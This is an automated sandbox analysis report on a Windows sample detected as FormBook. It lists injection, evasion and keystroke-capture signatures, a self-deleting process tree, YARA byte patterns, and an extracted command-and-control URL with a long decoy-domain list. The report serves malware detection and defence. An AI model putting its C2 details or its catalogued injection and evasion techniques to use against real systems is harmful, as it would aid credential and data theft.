Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report VJaX7U6LAp.exe

Overview

General Information

Sample Name:VJaX7U6LAp.exe
Analysis ID:510423
MD5:15a4b8c6607b8e67b0bba2d1b5dbd43e
SHA1:c77c0417b07c25c0e567f0d0362a8a80fc7c40e9
SHA256:c4b1789371d832969f812bd0a577e380cdac00db6775d7fc251adf8d92c15d74
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • VJaX7U6LAp.exe (PID: 6316 cmdline: 'C:\Users\user\Desktop\VJaX7U6LAp.exe' MD5: 15A4B8C6607B8E67B0BBA2D1B5DBD43E)
    • VJaX7U6LAp.exe (PID: 5088 cmdline: C:\Users\user\Desktop\VJaX7U6LAp.exe MD5: 15A4B8C6607B8E67B0BBA2D1B5DBD43E)
    • VJaX7U6LAp.exe (PID: 6284 cmdline: C:\Users\user\Desktop\VJaX7U6LAp.exe MD5: 15A4B8C6607B8E67B0BBA2D1B5DBD43E)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5040 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 6932 cmdline: /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.zahnimplantatangebotede.com/mxwf/"], "decoy": ["orders-cialis.info", "auctionorbuy.com", "meanmugsamore.com", "yachtcrewmark.com", "sacredkashilifestudio.net", "themintyard.com", "bragafoods.com", "sierp.com", "hausofdeme.com", "anthonyjames915.com", "bajardepesoencasa.com", "marciaroyal.com", "earringlifter.com", "dsdjfhd9ddksa1as.info", "bmzproekt.com", "employmentbc.com", "ptsdtreatment.space", "vrchance.com", "cnrongding.com", "welovelit.com", "intercourierdelivery.services", "ianwhitewrite.com", "afcerd.com", "beneficiodemedicare.com", "gatel3ess.com", "salesnksportswt.top", "thewellnessloft365.com", "totensa.com", "jessicatheisen.com", "snowtographers.com", "executrainpr.com", "puttypaw.com", "popcorntimeipad.com", "heyconi.com", "llanoresources.com", "ibusinesshero.com", "1euro1ad.com", "sparkleeapp.com", "zhuxiugyh.com", "calvinmaphoto.com", "bjmaomao.com", "isaacfujiki.com", "zipwhipper.com", "kontrollstutzen.com", "hannaheason.media", "zgcbw.net", "letteringdagabi.com", "kitefabrics.com", "andherieastoffices.com", "thewellnesstravelcompany.info", "ohio.works", "beacharita.com", "alphamillls.com", "sassandvinegar.com", "usauber.com", "ceylonherbslk.com", "richardggreenhill.com", "groupdae.com", "jupiterccc.com", "indoovo.com", "sunnytheodora.com", "gxpgfz.com", "shoppandaxpress.com", "heiboard.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.VJaX7U6LAp.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.VJaX7U6LAp.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.VJaX7U6LAp.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        4.0.VJaX7U6LAp.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.0.VJaX7U6LAp.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.zahnimplantatangebotede.com/mxwf/"], "decoy": ["orders-cialis.info", "auctionorbuy.com", "meanmugsamore.com", "yachtcrewmark.com", "sacredkashilifestudio.net", "themintyard.com", "bragafoods.com", "sierp.com", "hausofdeme.com", "anthonyjames915.com", "bajardepesoencasa.com", "marciaroyal.com", "earringlifter.com", "dsdjfhd9ddksa1as.info", "bmzproekt.com", "employmentbc.com", "ptsdtreatment.space", "vrchance.com", "cnrongding.com", "welovelit.com", "intercourierdelivery.services", "ianwhitewrite.com", "afcerd.com", "beneficiodemedicare.com", "gatel3ess.com", "salesnksportswt.top", "thewellnessloft365.com", "totensa.com", "jessicatheisen.com", "snowtographers.com", "executrainpr.com", "puttypaw.com", "popcorntimeipad.com", "heyconi.com", "llanoresources.com", "ibusinesshero.com", "1euro1ad.com", "sparkleeapp.com", "zhuxiugyh.com", "calvinmaphoto.com", "bjmaomao.com", "isaacfujiki.com", "zipwhipper.com", "kontrollstutzen.com", "hannaheason.media", "zgcbw.net", "letteringdagabi.com", "kitefabrics.com", "andherieastoffices.com", "thewellnesstravelcompany.info", "ohio.works", "beacharita.com", "alphamillls.com", "sassandvinegar.com", "usauber.com", "ceylonherbslk.com", "richardggreenhill.com", "groupdae.com", "jupiterccc.com", "indoovo.com", "sunnytheodora.com", "gxpgfz.com", "shoppandaxpress.com", "heiboard.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: VJaX7U6LAp.exeVirustotal: Detection: 10%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: VJaX7U6LAp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: VJaX7U6LAp.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe
          Source: Binary string: help.pdbGCTL source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: help.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4x nop then pop ebx4_2_00407AFA
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4x nop then pop edi4_2_00417D6A
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx11_2_00487B02
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi11_2_00497D6A

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.usauber.com
          Source: C:\Windows\explorer.exeDomain query: www.vrchance.com
          Source: C:\Windows\explorer.exeDomain query: www.sunnytheodora.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.zahnimplantatangebotede.com/mxwf/
          Source: explorer.exe, 00000006.00000000.399795242.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: unknownDNS traffic detected: queries for: www.usauber.com
          Source: VJaX7U6LAp.exe, 00000000.00000002.361662121.000000000086A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: VJaX7U6LAp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
